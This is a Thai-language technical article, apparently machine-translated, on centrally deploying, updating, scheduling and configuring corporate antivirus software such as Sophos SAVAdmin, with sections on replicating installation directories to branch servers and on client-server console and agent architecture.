ตัวอย่างเช่น การใช้ยูทิลิตี้ SAVAdmin ของระบบป้องกันไวรัสของ Sophos ผู้ดูแลระบบสามารถสร้างไดเร็กทอรีการแจกจ่ายสำหรับ Central Installation Directory (CID) โดยวางไว้บนเซิร์ฟเวอร์บางตัวในเครือข่ายขององค์กร ตัวอย่างเช่น คุณสามารถสร้างไดเร็กทอรีดังกล่าวที่สำนักงานกลางและหนึ่งไดเร็กทอรีสำหรับแต่ละแผนกระยะไกลของบริษัท

ผู้ดูแลระบบสามารถตั้งค่าการจำลองแบบระหว่างไดเร็กทอรี CID ต่างๆ ซึ่งจะดำเนินการโดยอัตโนมัติ ในกรณีนี้ เขาจะไม่ต้องอัปเดตไดเร็กทอรี CID ทั้งหมดด้วยตัวเอง - คุณสามารถแทนที่ไฟล์การแจกจ่ายของระบบป้องกันไวรัสในไดเร็กทอรีหลักเท่านั้น เนื้อหาของไดเร็กทอรีอื่น (เช่น ที่อยู่ในรีโมตสาขา) จะได้รับการอัปเดตโดยอัตโนมัติ และแอนตี้ไวรัสจะได้รับการอัปเดตบนเวิร์กสเตชันทั้งหมดของเครือข่ายท้องถิ่นที่เกี่ยวข้องของสาขาด้วย

ถัดไป ผู้ดูแลระบบจากคอนโซล SAVAdmin จะเริ่มการติดตั้งโปรแกรมป้องกันไวรัสจากระยะไกลจากแค็ตตาล็อก CID บนเวิร์กสเตชัน กลุ่มของเวิร์กสเตชัน หรือโดเมนที่เลือก เมื่อเนื้อหาของ CID เปลี่ยนไป โปรแกรมป้องกันไวรัสทั้งหมดในเครือข่ายจะได้รับการอัปเดตโดยอัตโนมัติ ผู้ดูแลระบบสามารถควบคุมกระบวนการอัปเดตเวอร์ชันของโปรแกรมป้องกันไวรัสได้

Sophos ได้พัฒนาเทคโนโลยี "minimal push and full pull" เพื่อเพิ่มความเร็วในกระบวนการติดตั้งและอัปเดตโปรแกรมป้องกันไวรัส เทคโนโลยีนี้เกี่ยวข้องกับการติดตั้งและอัปเดตเวอร์ชันแอนตี้ไวรัสแบบขนาน ในเวลาเดียวกัน การอัปเดตเครือข่ายที่ประกอบด้วยคอมพิวเตอร์มากกว่า 1,000 เครื่องจะดำเนินการใน 10 นาที

มาดูขั้นตอนการติดตั้งแบบรวมศูนย์กันดีกว่า

สร้างไดเรกทอรีต้นแบบการติดตั้งจากส่วนกลาง

ในขั้นแรก ผู้ดูแลระบบจะสร้างไดเร็กทอรีหลักของการติดตั้งแบบรวมศูนย์จากเวิร์กสเตชันของเขา ไดเร็กทอรีนี้มักจะอยู่บนหนึ่งในเซิร์ฟเวอร์ LAN ส่วนกลางของบริษัท (รูปที่ 1-1)

การสร้างไดเร็กทอรีการติดตั้งแบบรวมศูนย์หลักและการสร้างเนื้อหาจะดำเนินการโดยอัตโนมัติโดยโปรแกรมการติดตั้งเริ่มต้นซึ่งเรียกใช้โดยผู้ดูแลระบบจากเวิร์กสเตชันของเขา

ข้าว. 1-1. การคัดลอกไฟล์ไปยังไดเร็กทอรีหลักการติดตั้งส่วนกลาง

การจำลองแบบของไดเรกทอรีต้นแบบการติดตั้งแบบรวมศูนย์

หากเครือข่ายองค์กรรวมสาขาที่ห่างไกลทางภูมิศาสตร์ที่เชื่อมต่อด้วยช่องทางการสื่อสารที่ค่อนข้างช้า เพื่อเพิ่มความเร็วในการติดตั้งโปรแกรมป้องกันไวรัสบนเซิร์ฟเวอร์และเวิร์กสเตชันของสาขา ผู้ดูแลระบบสามารถสร้างไดเร็กทอรีการติดตั้งแบบรวมศูนย์บนเซิร์ฟเวอร์สาขา (รูปที่ 1- 2).

ไดเร็กทอรีเหล่านี้ถูกสร้างขึ้นและบรรจุภายใต้การควบคุมของโปรแกรมการตั้งค่าเริ่มต้นที่ทำงานบนเวิร์กสเตชันของผู้ดูแลระบบ ในกรณีนี้ ผู้ดูแลระบบสามารถระบุการตั้งค่าสำหรับการจำลองแบบอัตโนมัติของเนื้อหาของไดเร็กทอรีการติดตั้งแบบรวมศูนย์หลักและไดเร็กทอรีการติดตั้งแบบรวมศูนย์อื่นๆ เมื่ออัปเดตเนื้อหาของไดเร็กทอรีหลัก เนื้อหาของไดเร็กทอรีอื่นในการติดตั้งแบบรวมศูนย์จะได้รับการอัปเดตโดยอัตโนมัติตามกำหนดการที่ผู้ดูแลระบบกำหนด

ข้าว. 1-2. การจำลองไฟล์ไดเร็กทอรีหลักสำหรับการติดตั้งแบบรวมศูนย์ไปยังไดเร็กทอรีการติดตั้งแบบรวมศูนย์อื่น ๆ

การติดตั้งโปรแกรมป้องกันไวรัสบนเวิร์กสเตชันและเซิร์ฟเวอร์ทั้งหมด

หลังจากการก่อตัวของไดเร็กทอรีทั้งหมดของการติดตั้งแบบรวมศูนย์ กระบวนการติดตั้งโปรแกรมป้องกันไวรัสบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายจะเริ่มต้นขึ้น การติดตั้งจะดำเนินการพร้อมกันบนคอมพิวเตอร์ทุกเครื่อง และเครือข่ายท้องถิ่นแต่ละเครือข่ายจะใช้ไดเร็กทอรีการติดตั้งแบบรวมศูนย์ของตนเอง (รูปที่ 1-3)

กำหนดการติดตั้งถูกกำหนดโดยผู้ดูแลระบบ เนื่องจากการติดตั้งดำเนินการในแต่ละสาขาจากไดเร็กทอรีของตัวเอง กระบวนการนี้จึงไม่โอเวอร์โหลดช่องทางการสื่อสารที่เชื่อมต่อเครือข่ายท้องถิ่นของสาขา

อัพเดทฐานข้อมูลแอนตี้ไวรัสจากระยะไกล

ไม่มีใครสงสัยความเกี่ยวข้องของการอัปเดตฐานข้อมูลต่อต้านไวรัสอย่างทันท่วงทีเพื่อตรวจหาไวรัสใหม่ อย่างไรก็ตาม ในบริษัทขนาดกลางและขนาดใหญ่ กระบวนการนี้มีคุณลักษณะหลายอย่าง

การออกแบบกำหนดการอัพเดท

ประการแรก มีปัญหาในการพัฒนาตารางเวลาสำหรับการอัปเดตฐานข้อมูลต่อต้านไวรัสโดยอัตโนมัติ

ดังที่คุณทราบ โปรแกรมป้องกันไวรัสส่วนใหญ่มีการอัปเดตฐานข้อมูลต่อต้านไวรัสโดยอัตโนมัติตามกำหนดเวลา เช่น ตามเวลาและวันที่ระบุในสัปดาห์ อย่างไรก็ตาม เพื่อให้การอัปเดตเสร็จสมบูรณ์ คอมพิวเตอร์จะต้องเปิดและเชื่อมต่อกับอินทราเน็ตภายในของบริษัทหรืออินเทอร์เน็ตเมื่อเริ่มขั้นตอน

บางครั้งผู้ดูแลระบบตั้งค่ากำหนดการอัปเดตเพื่อให้การดาวน์โหลดฐานข้อมูลต่อต้านไวรัสใหม่เริ่มต้นในเวลากลางวัน แต่ถ้าใช้คอมพิวเตอร์ทำงานเป็นกะ การเลือกเวลาอัพเดทก็ไม่ใช่เรื่องง่ายเสมอไป

ข้าว. 1-3. การติดตั้งพร้อมกันบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายขององค์กรทั้งหมดจากไดเรกทอรีการติดตั้งแบบรวมศูนย์

ปัญหาเกี่ยวกับการจัดกำหนดการผู้ใช้

ทั้งนี้เนื่องมาจากคุณสมบัติที่ไม่เพียงพอของผู้ใช้ และความเต็มใจที่จะดำเนินการใดๆ ของระบบที่ไม่เกี่ยวข้องโดยตรงกับหน้าที่การผลิต และในทางกลับกัน เนื่องจากขาดการเข้าถึงทรัพยากรระบบที่จำเป็นในการกำหนดค่า ดังที่เราได้กล่าวไว้ข้างต้น ผู้ดูแลระบบมักจะตั้งค่านโยบายระบบในลักษณะที่ผู้ใช้ทั่วไปไม่สามารถติดตั้งโปรแกรมระบบหรือเปลี่ยนการตั้งค่าด้วยตนเองได้

อัพเดทฐานข้อมูลต่อต้านไวรัสแบบรวมศูนย์

ระบบต่อต้านไวรัสสมัยใหม่ช่วยให้จัดการกระบวนการอัปเดตฐานข้อมูลต่อต้านไวรัสแบบรวมศูนย์โดยอัตโนมัติ และยังให้เครื่องมือที่จำเป็นทั้งหมดแก่ผู้ดูแลระบบสำหรับการควบคุมการอัปเดตจากระยะไกล

คอนโซลการจัดการของผู้ดูแลระบบไม่เพียงแต่จะควบคุมการอัปเดตเท่านั้น หากจำเป็น ยังสามารถเปิดใช้การอัพเดตแบบบังคับสำหรับเวิร์กสเตชัน กลุ่มผู้ใช้ หรือโดเมนใดๆ

การอัปเดตจะดำเนินการในลักษณะเดียวกับการติดตั้งครั้งแรก

ขั้นแรก ผู้ดูแลระบบเขียนไฟล์อัพเดตไปยังไดเร็กทอรีหลักของการติดตั้งแบบรวมศูนย์ (รูปที่ 1-1) เนื้อหาของไดเร็กทอรีนี้จะถูกจำลองแบบไปยังไดเร็กทอรีการติดตั้งแบบรวมศูนย์อื่น ๆ (รูปที่ 1-2) และสุดท้าย ในขั้นตอนสุดท้าย ฐานข้อมูลต่อต้านไวรัสของเซิร์ฟเวอร์และเวิร์กสเตชันได้รับการอัพเดตจากไดเร็กทอรีที่เกี่ยวข้องของการติดตั้งแบบรวมศูนย์ (รูปที่ 1-3)

หากเครือข่ายองค์กรเชื่อมต่อกับอินเทอร์เน็ต เนื้อหาของไดเร็กทอรีการติดตั้งส่วนกลางหลักสามารถอัปเดตได้โดยอัตโนมัติจากเซิร์ฟเวอร์ของบริษัทป้องกันไวรัส ผู้ดูแลระบบเครือข่ายขององค์กรสามารถกำหนดตารางเวลาสำหรับการอัปเดตดังกล่าวได้

การกำหนดค่าแอนติไวรัสหลังการติดตั้ง

หลังจากการติดตั้งเสร็จสิ้น คุณสามารถเลือกการกำหนดค่าโปรแกรมป้องกันไวรัสมาตรฐานบางอย่างได้ เช่น ให้การสแกนไฟล์ป้องกันไวรัสเมื่อเข้าถึงไฟล์เหล่านั้น ตลอดจนสร้างรายงานผลการสแกน

หากจำเป็น เครื่องมือการจัดการและควบคุมระยะไกลจะอนุญาตให้คุณกำหนดการกำหนดค่าการป้องกันไวรัสอื่นที่ระบุโดยใช้กลไกเทมเพลต ผู้ดูแลระบบสามารถเตรียมเทมเพลตต่างๆ ที่กำหนดโหมดการทำงานของแอนตี้ไวรัสสำหรับเวิร์กสเตชัน กลุ่มผู้ใช้ หรือโดเมนต่างๆ ได้

การกำหนดค่าระยะไกลของโปรแกรมป้องกันไวรัส

เป็นที่ทราบกันดีว่าประสิทธิภาพของการใช้งานนั้นขึ้นอยู่กับความถูกต้องของการตั้งค่าโปรแกรมป้องกันไวรัส ตัวอย่างเช่น การปฏิเสธที่จะสแกนไฟล์ทั้งหมดที่ไม่มีนามสกุล .com หรือ .exe เพื่อเร่งการทำงาน ผู้ใช้อาจเสี่ยงต่อการติดไวรัส Macrocommand ในคอมพิวเตอร์ที่แพร่กระจายผ่านไฟล์เอกสารสำนักงาน

ตามกฎแล้ว ผู้ดูแลระบบที่มองการณ์ไกลจะไม่ไว้วางใจให้ผู้ใช้กำหนดการตั้งค่าโปรแกรมป้องกันไวรัส โดยเฉพาะอย่างยิ่งการตั้งค่าที่เกี่ยวข้องกับโหมดการสแกนไฟล์ อย่างไรก็ตาม พวกเขาต้องทำงานนี้ด้วยตัวเอง

โปรดทราบว่าในอินทราเน็ตขององค์กรขนาดใหญ่ บางครั้งคุณต้องใช้การตั้งค่าที่แตกต่างกันสำหรับผู้ใช้ กลุ่มผู้ใช้ หรือโดเมนที่แตกต่างกัน ทั้งหมดนี้ทำให้การกำหนดค่าด้วยตนเองของการตั้งค่าโปรแกรมป้องกันไวรัสมีความซับซ้อน

ระบบป้องกันไวรัสสมัยใหม่ช่วยให้กำหนดค่าพารามิเตอร์ทั้งหมดของโปรแกรมป้องกันไวรัสได้จากระยะไกลจากส่วนกลาง (โหมดการทำงานของเครื่องสแกน กำหนดการอัพเดตฐานข้อมูลป้องกันไวรัส การดำเนินการกับไฟล์ที่ติดไวรัส ฯลฯ) ผู้ดูแลระบบสามารถดำเนินการนี้ได้จากเวิร์กสเตชันของเขา และผู้ดูแลระบบสามารถใช้รูปแบบการตั้งค่าที่แตกต่างกันสำหรับผู้ใช้ กลุ่มผู้ใช้ และโดเมนต่างๆ

การค้นพบเวิร์กสเตชันใหม่

อินทราเน็ตของบริษัทขนาดใหญ่ใช้ชีวิตของตัวเอง ในบางครั้ง อาจมีเหตุการณ์ต่างๆ เช่น การเชื่อมต่อของเวิร์กสเตชันใหม่ การซ่อมแซมหรือการเปลี่ยนเวิร์กสเตชันเก่า ฯลฯ เกิดขึ้น

ในเวลาเดียวกัน การเปลี่ยนแปลงทั้งหมดในการกำหนดค่าของเวิร์กสเตชันในเครือข่ายจำเป็นต้องอัปเดตการกำหนดค่าเครื่องมือป้องกันไวรัสอย่างทันท่วงที อย่างไรก็ตาม ผู้ดูแลระบบคนเดียวไม่สามารถติดตามการเปลี่ยนแปลงทั้งหมดในเครือข่ายของคอมพิวเตอร์หลายแสนเครื่องได้ ดังนั้นระบบต่อต้านไวรัสที่ทันสมัยจึงเสริมด้วยเครื่องมือสำหรับการวิจัยอัตโนมัติของการกำหนดค่าเครือข่ายสำหรับการปรากฏตัวของสถานีใหม่ในนั้นหรือแทนที่สถานีเก่า

เมื่อตรวจพบการเปลี่ยนแปลงในการกำหนดค่าเครือข่าย ระบบควบคุมและจัดการจะติดตั้งโปรแกรมป้องกันไวรัสโดยอัตโนมัติ หรือหากจำเป็น ให้อัปเดตโมดูลซอฟต์แวร์ป้องกันไวรัสและฐานข้อมูลป้องกันไวรัสโดยอัตโนมัติ ด้วยเหตุนี้ หลังจากติดตั้งเวิร์กสเตชัน หลังจากการซ่อมแซมหรือเปลี่ยนใหม่ โปรแกรมป้องกันไวรัสจะถูกติดตั้งบนดิสก์โดยอัตโนมัติโดยไม่เกี่ยวข้องกับผู้ดูแลระบบหรือผู้ใช้

ตารางงาน

ระบบการจัดการและควบคุมระยะไกลแบบรวมศูนย์ช่วยให้คุณสามารถกำหนดเวลางานสำหรับคอมพิวเตอร์แต่ละเครื่องในเครือข่ายองค์กร สำหรับกลุ่มผู้ใช้หรือโดเมนที่เลือก ตลอดจนควบคุมความคืบหน้าและผลลัพธ์ของงานที่กำลังดำเนินการอยู่

การเลือกกำหนดการ

การวางแผนช่วยให้คุณกำหนดความถี่ของการดำเนินการตามขั้นตอนต่าง ๆ ตามกำหนดการต่างๆ:

• รายชั่วโมง;
• รายวัน;
• รายสัปดาห์;
• ในบางวันของสัปดาห์หรือเดือน
• ชั่วโมงถัดไป วันในสัปดาห์หรือเดือน
• การดำเนินการครั้งเดียวในเวลาที่กำหนด
• ดำเนินการขั้นตอนเดียวทันที

รายการขั้นตอนที่วางแผนไว้

นี่คือรายการขั้นตอนที่สามารถกำหนดเวลาได้ในระบบป้องกันไวรัสสมัยใหม่:

• การสร้างรายงานโดยละเอียดเกี่ยวกับการกำหนดค่าฮาร์ดแวร์และซอฟต์แวร์ของเวิร์กสเตชัน
• การกำหนดหมายเลขเวอร์ชันของโปรแกรมป้องกันไวรัส ตลอดจนวันที่สร้างและหมายเลขเวอร์ชันของฐานข้อมูลป้องกันไวรัส
• การติดตั้งโปรแกรมป้องกันไวรัสบนคอมพิวเตอร์ที่เลือก บนคอมพิวเตอร์ของกลุ่มผู้ใช้หรือโดเมน
• อัปเดตเนื้อหาของไดเร็กทอรีการแจกจ่ายของการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์
• การเปลี่ยนเส้นทางไปยังไดเร็กทอรีการแจกจ่ายของการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์
• การเปลี่ยนบัญชี (ตัวระบุ/รหัสผ่าน) ที่ใช้ในการอัปเดตโปรแกรมป้องกันไวรัสและฐานข้อมูลป้องกันไวรัส
• การตรวจหาการเปลี่ยนแปลงในการกำหนดค่าเครือข่าย (ค้นหาเวิร์กสเตชันใหม่หรือที่อัปเดต) เพื่อติดตั้งโปรแกรมป้องกันไวรัสบนคอมพิวเตอร์เครื่องใหม่โดยอัตโนมัติ
• การจำลองไดเร็กทอรีการกระจายหลักของการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์ไปยังไดเร็กทอรีอื่น (เช่น อยู่บนเซิร์ฟเวอร์ที่ติดตั้งในสาขาของบริษัท) ขั้นตอนนี้ใช้เพื่อแจกจ่ายชุดการแจกจ่ายใหม่หรือที่อัปเดตไปยังเซิร์ฟเวอร์หลายเครื่องที่ออกแบบมาสำหรับการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์

ระบบควบคุมช่วยให้คุณกำหนดการดำเนินการคำสั่งตามอำเภอใจของระบบปฏิบัติการก่อนเริ่มงานและหลังจากดำเนินการแล้ว

คุณยังสามารถกำหนดการดำเนินการที่ต้องทำเมื่องานหยุดทำงาน ตัวอย่างเช่น คุณสามารถทำการติดตั้งโปรแกรมป้องกันไวรัสซ้ำได้ หากไม่สำเร็จด้วยเหตุผลบางประการ

การเริ่มต้นและหยุดงาน

ผู้ดูแลระบบสามารถเริ่มหรือหยุดขั้นตอนที่ระบุได้ตลอดเวลาโดยใช้คอนโซลการจัดการ

แก้ไขงาน

แก้ไขงานที่เตรียมไว้แต่ยังไม่เริ่ม ในเวลาเดียวกัน ผู้ดูแลระบบสามารถเปลี่ยนกำหนดการของงานที่กำลังทำงานอยู่ ประเภทของงาน และคุณลักษณะอื่นๆ ของงานได้

การลบงาน

หากงานอยู่ในคิวเพื่อดำเนินการหรือทำงานอยู่ ผู้ดูแลระบบสามารถลบงานได้ งานที่กำลังทำงานอยู่จะหยุดลง

การควบคุมการดำเนินการงาน

งานที่กำหนดเวลาไว้มักจะได้รับชื่อและประเภท ประเภทกำหนดการดำเนินการที่จะดำเนินการ และผู้ดูแลระบบจะใช้ชื่อเพื่อติดตามผลงาน การตรวจสอบดังกล่าวสามารถทำได้อย่างต่อเนื่องตามเวลาจริง

เครื่องมือการเรียงลำดับขั้นสูงช่วยให้คุณติดตามเฉพาะกลุ่มงานที่จำเป็น เช่น:

• งานบางประเภท
• งานที่ทำงานบนเวิร์กสเตชันที่เลือก
• งานที่ทำงานบนเวิร์กสเตชันของกลุ่มผู้ใช้
• งานที่ทำงานบนเวิร์กสเตชันของโดเมนที่เลือก

ผลลัพธ์ของการดำเนินการงานจะถูกบันทึกไว้

ตัวเลือกงาน

ผู้ดูแลระบบสามารถตั้งค่าพารามิเตอร์ต่างๆ สำหรับงานตามกำหนดการได้โดยใช้คอนโซลการจัดการและควบคุมระยะไกล

พารามิเตอร์ทั่วไป

เราได้ระบุตัวเลือกงานทั่วไปด้านล่าง:

• ชื่องาน;
• ชื่อไฟล์สำหรับบันทึกผลงาน;
• คำสั่งที่จะดำเนินการก่อนและหลังเสร็จสิ้นงาน
• ธงการคงอยู่ของงาน งานถาวร ต่างจากงานชั่วคราว จะได้รับการกู้คืนเมื่อรีสตาร์ทคอนโซลการจัดการ
• ช่องทำเครื่องหมายสำหรับดำเนินงานสำหรับคอมพิวเตอร์ทุกเครื่องในกลุ่มที่ระบุ
• ช่องทำเครื่องหมายเพื่อลองงานใหม่โดยอัตโนมัติหากล้มเหลว

พารามิเตอร์เป้าหมาย

การตั้งค่าเหล่านี้จะกำหนดเวิร์กสเตชัน กลุ่มผู้ใช้ และโดเมนที่จะรันงาน อันที่จริง นี่เป็นเพียงรายการคอมพิวเตอร์ กลุ่มผู้ใช้ หรือโดเมนที่สร้างโดยผู้ดูแลระบบ

ตัวเลือกการติดตั้งเพิ่มเติม

กลุ่มนี้มีการตั้งค่าที่ส่งผลต่อการตั้งค่าสำหรับการติดตั้งโปรแกรมป้องกันไวรัสที่เกี่ยวข้องกับการสแกนเครือข่ายเพื่อหาสำเนาโปรแกรมป้องกันไวรัสที่ติดตั้ง คุณสามารถระบุได้ว่าควรทำการติดตั้งบนเวิร์กสเตชันที่:

• ไม่มีสำเนาของโปรแกรมป้องกันไวรัสที่ติดตั้ง
• มีสำเนาของโปรแกรมป้องกันไวรัสที่ล้าสมัย
• ไม่มีสำเนาของโปรแกรมป้องกันไวรัสที่ติดตั้งหรือมีสำเนาของโปรแกรมป้องกันไวรัสที่ล้าสมัย

เป็นไปได้ที่จะทำการบังคับให้อัปเดตสำเนาของโปรแกรมป้องกันไวรัสที่อัปเดตก่อนหน้านี้อีกครั้ง

ตัวเลือกการกำหนดค่าแอนติไวรัส

เมื่อใช้ตัวเลือกเหล่านี้ คุณสามารถระบุไฟล์ที่มีเทมเพลตการตั้งค่าการกำหนดค่าสำหรับแอปพลิเคชันป้องกันไวรัส คุณยังสามารถระบุชื่อสำหรับแต่ละเทมเพลตดังกล่าวได้

จำได้ว่าเทมเพลตช่วยให้คุณบันทึกชุดการตั้งค่าโปรแกรมป้องกันไวรัสที่แตกต่างกันสำหรับเวิร์กสเตชัน กลุ่มผู้ใช้ หรือโดเมนต่างๆ

ตำแหน่งของไดเร็กทอรีการติดตั้งส่วนกลางหลัก

การตั้งค่ากลุ่มนี้กำหนดตำแหน่งทางกายภาพของไดเร็กทอรีหลักสำหรับการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์ ไดเร็กทอรีนี้สามารถจำลองแบบไปยังไดเร็กทอรีอื่นที่อยู่ ตัวอย่างเช่น บนดิสก์ของเซิร์ฟเวอร์ระยะไกลของสาขาของบริษัท

ตำแหน่งของไดเร็กทอรีสำหรับติดตั้งโปรแกรมป้องกันไวรัสบนเวิร์กสเตชัน

ผู้ดูแลระบบสามารถระบุพาธไปยังไดเร็กทอรีเวิร์กสเตชันที่ควรติดตั้งโปรแกรมป้องกันไวรัส

สามารถเลือกไดเร็กทอรีดีฟอลต์หรือไดเร็กทอรีเฉพาะสำหรับคอนฟิกูเรชันนี้

บัญชีสำหรับติดตั้งและอัปเดตโปรแกรมป้องกันไวรัส

ชุดพารามิเตอร์นี้ช่วยให้คุณระบุบัญชี (ตัวระบุ รหัสผ่าน และโดเมน) ที่เวิร์กสเตชันจะใช้เพื่ออัปเดตโปรแกรมป้องกันไวรัสและฐานข้อมูลป้องกันไวรัส บัญชีนี้ไม่จำเป็นต้องมีสิทธิ์ของผู้ดูแลระบบ

ตัวเลือกสำหรับเปลี่ยนไดเร็กทอรีการติดตั้งส่วนกลางปัจจุบัน

ตัวเลือกเหล่านี้ช่วยให้คุณสร้างไดเร็กทอรีการติดตั้งส่วนกลางที่ใช้ร่วมกันที่ลงทะเบียนไว้ซึ่งมีการแจกจ่ายโปรแกรมป้องกันไวรัสต่างๆ หลายโปรแกรมพร้อมกัน หรือแยกไดเร็กทอรีสำหรับโปรแกรมป้องกันไวรัสแต่ละโปรแกรมแยกจากกัน

ตัวเลือกการจำลองแบบไดเรกทอรีการติดตั้งแบบรวมศูนย์

ตัวเลือกเหล่านี้อนุญาตให้คุณเลือกไดเร็กทอรีที่เกี่ยวข้องกับการจำลองแบบ และควรลบไฟล์การแจกจ่ายเก่าก่อนการจำลองแบบหรือไม่

คุณยังสามารถตั้งค่าโหมดการจำลองแบบบางส่วน ซึ่งจะมีการจำลองเฉพาะไฟล์ฐานข้อมูลต่อต้านไวรัสและไฟล์โปรแกรมที่สำคัญที่สุดเท่านั้น โหมดนี้สะดวกเป็นพิเศษในกรณีที่ทำการจำลองแบบผ่านช่องทางการสื่อสารที่ช้า (เช่น โมเด็ม)

ตัวเลือกการสแกนเครือข่ายเพื่อตรวจหาคอมพิวเตอร์เครื่องใหม่

การสแกนเหล่านี้ดำเนินการเพื่อติดตั้งโปรแกรมป้องกันไวรัสบนคอมพิวเตอร์เครื่องใหม่โดยอัตโนมัติ

การตั้งค่าเหล่านี้ทำให้คุณสามารถกำหนดกลุ่มของคอมพิวเตอร์และโดเมนที่จะสแกนได้

ตัวเลือกรายงาน

ตัวเลือกเหล่านี้ช่วยให้คุณระบุชื่อไฟล์ที่จะบันทึกรายงาน ตลอดจนคำสั่งที่จะดำเนินการหลังจากสร้างรายงาน คำสั่งนี้สามารถโหลดรายงานที่สร้างขึ้นลงใน Microsoft Excel ได้

3. พารามิเตอร์ของโปรแกรมควบคุมและจัดการ

ระบบตรวจสอบและควบคุมแบบคลาสสิกประกอบด้วยโปรแกรมควบคุมที่ทำงานบนเวิร์กสเตชันของผู้ดูแลระบบและโปรแกรมตัวแทนที่ทำงานบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่าย

พารามิเตอร์ของโปรแกรมควบคุมและการจัดการส่งผลต่อโหมดการทำงานของโปรแกรมและตัวแทน โดยการเปลี่ยนการตั้งค่าเหล่านี้ ผู้ดูแลระบบสามารถเลือกโปรโตคอลเครือข่ายที่ต้องการซึ่งคอนโซลใช้ในการสื่อสารกับตัวแทน ตลอดจนกำหนดค่าพารามิเตอร์ของโปรโตคอลเครือข่ายที่เลือก

การกำหนดค่าโปรแกรมตรวจสอบและควบคุม

ตัวเลือกเหล่านี้ช่วยให้คุณตั้งค่า:

• โหมดแสดงรายการคอมพิวเตอร์เครือข่ายทั้งหมด (อัตโนมัติหรือโดยชัดแจ้ง);
• จำนวนเธรดของการดำเนินการ (เธรด) สำหรับการอัพเดตข้อมูลเกี่ยวกับสถานะของเครือข่าย
• จำนวนครั้งที่พยายามดึงข้อมูลจากคอมพิวเตอร์ระยะไกล (จำเป็นในกรณีที่ช่องทางการสื่อสารไม่เสถียร)
• ตำแหน่งของไฟล์บันทึกส่วนกลางที่เก็บเหตุการณ์ที่เกี่ยวข้องกับการทำงานของการป้องกันไวรัสในคอมพิวเตอร์ทุกเครื่องในเครือข่ายองค์กร
• การตั้งค่าบัญชีผู้ดูแลระบบที่ใช้เพื่อจัดการการป้องกันไวรัส (ตัวระบุ รหัสผ่าน โดเมน ฯลฯ)

การกำหนดค่าตัวแทน

โปรแกรมเอเจนต์เปิดตัวบนเวิร์กสเตชันและโต้ตอบกับโปรแกรมควบคุม การตั้งค่าต่อไปนี้ถูกกำหนดคอนฟิกสำหรับตัวแทน:

• โปรโตคอลเครือข่ายที่ใช้โต้ตอบกับโปรแกรมควบคุม (TCP/IP, IPX/SPX, NetBIOS ผ่าน TCP, NetBIOS ผ่าน IPX, Named pipes ฯลฯ );
• จุดสิ้นสุด (จุดสิ้นสุด);
• หมายเลขพอร์ต

4. สถาปัตยกรรมและหลักการทำงานของระบบป้องกันไวรัสขององค์กร

เมื่อพิจารณาถึงวัตถุประสงค์และหน้าที่ของระบบควบคุมและตรวจสอบการป้องกันไวรัสแล้ว มาดูการทบทวนโซลูชันสถาปัตยกรรมที่ใช้ในระบบป้องกันไวรัสขององค์กรสมัยใหม่กัน เหล่านี้เป็นสถาปัตยกรรมไคลเอนต์-เซิร์ฟเวอร์แบบคลาสสิก เช่นเดียวกับสถาปัตยกรรมหลายระดับที่เกี่ยวข้องกับการใช้เทคโนโลยีเว็บ

ระบบไคลเอนต์-เซิร์ฟเวอร์

เมื่อใช้สถาปัตยกรรมไคลเอนต์ - เซิร์ฟเวอร์ พื้นฐานของระบบการจัดการและการควบคุมคือเซิร์ฟเวอร์ป้องกันไวรัสที่ติดตั้งบนหนึ่งในเซิร์ฟเวอร์เครือข่ายขององค์กร มันโต้ตอบกับโปรแกรมตัวแทนที่ติดตั้งพร้อมกับโปรแกรมป้องกันไวรัสบนเวิร์กสเตชันเครือข่ายและในทางกลับกันกับคอนโซลการจัดการของผู้ดูแลระบบป้องกันไวรัส (รูปที่ 4-1)

ข้าว. 4-1. การโต้ตอบระหว่างคอนโซลผู้ดูแลระบบ ตัวแทน และเซิร์ฟเวอร์ป้องกันไวรัส

เซิร์ฟเวอร์ป้องกันไวรัสดำเนินการจัดการและประสานงานการดำเนินการ โดยเฉพาะอย่างยิ่ง จะเก็บบันทึกทั่วไปของเหตุการณ์ที่เกี่ยวข้องกับการป้องกันไวรัสและเกิดขึ้นบนคอมพิวเตอร์ทุกเครื่องในเครือข่าย ตลอดจนรายการและกำหนดการของงาน เซิร์ฟเวอร์ป้องกันไวรัสมีหน้าที่รับข้อความจากตัวแทนและส่งไปยังผู้ดูแลระบบป้องกันไวรัสเกี่ยวกับเหตุการณ์บางอย่างในเครือข่าย ดำเนินการตรวจสอบการกำหนดค่าเครือข่ายเป็นระยะเพื่อตรวจหาเวิร์กสเตชันใหม่หรือเวิร์กสเตชันที่มีการเปลี่ยนแปลงการต่อต้าน การกำหนดค่าไวรัส ฯลฯ

นอกจากตัวแทนแล้ว โปรแกรมป้องกันไวรัสยังได้รับการติดตั้งในแต่ละเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายขององค์กรที่สแกนไฟล์และตรวจสอบไฟล์เมื่อเปิดขึ้น (ฟังก์ชันเครื่องสแกนเนอร์และโปรแกรมป้องกันไวรัส) ผลลัพธ์ของการดำเนินการต่อต้านไวรัสจะถูกส่งผ่านตัวแทนไปยังเซิร์ฟเวอร์ป้องกันไวรัส ซึ่งจะวิเคราะห์และบันทึกไว้ในบันทึกเหตุการณ์ทั่วไป

คอนโซลการจัดการของผู้ดูแลระบบให้ความสามารถในการจัดการระบบป้องกันไวรัสทั้งหมดและตรวจสอบการทำงานของระบบ มันโต้ตอบผ่านตัวแทนกับเซิร์ฟเวอร์ต่อต้านไวรัส เช่นเดียวกับโปรแกรมป้องกันไวรัสที่ติดตั้งบนคอมพิวเตอร์ทุกเครื่องในเครือข่าย

คอนโซลการจัดการนี้สามารถเป็นแอปพลิเคชัน Microsoft Windows มาตรฐานที่มีอินเทอร์เฟซหน้าต่าง หรือแอปเพล็ต (สแน็ปอิน) ของคอนโซลการจัดการแผงควบคุมของระบบปฏิบัติการ Microsoft Windows แนวทางแรกถูกนำมาใช้ ตัวอย่างเช่น ในระบบจัดการแอนตี้ไวรัสของ Sophos และวิธีที่สอง - ในระบบการจัดการ Norton AntiVirus

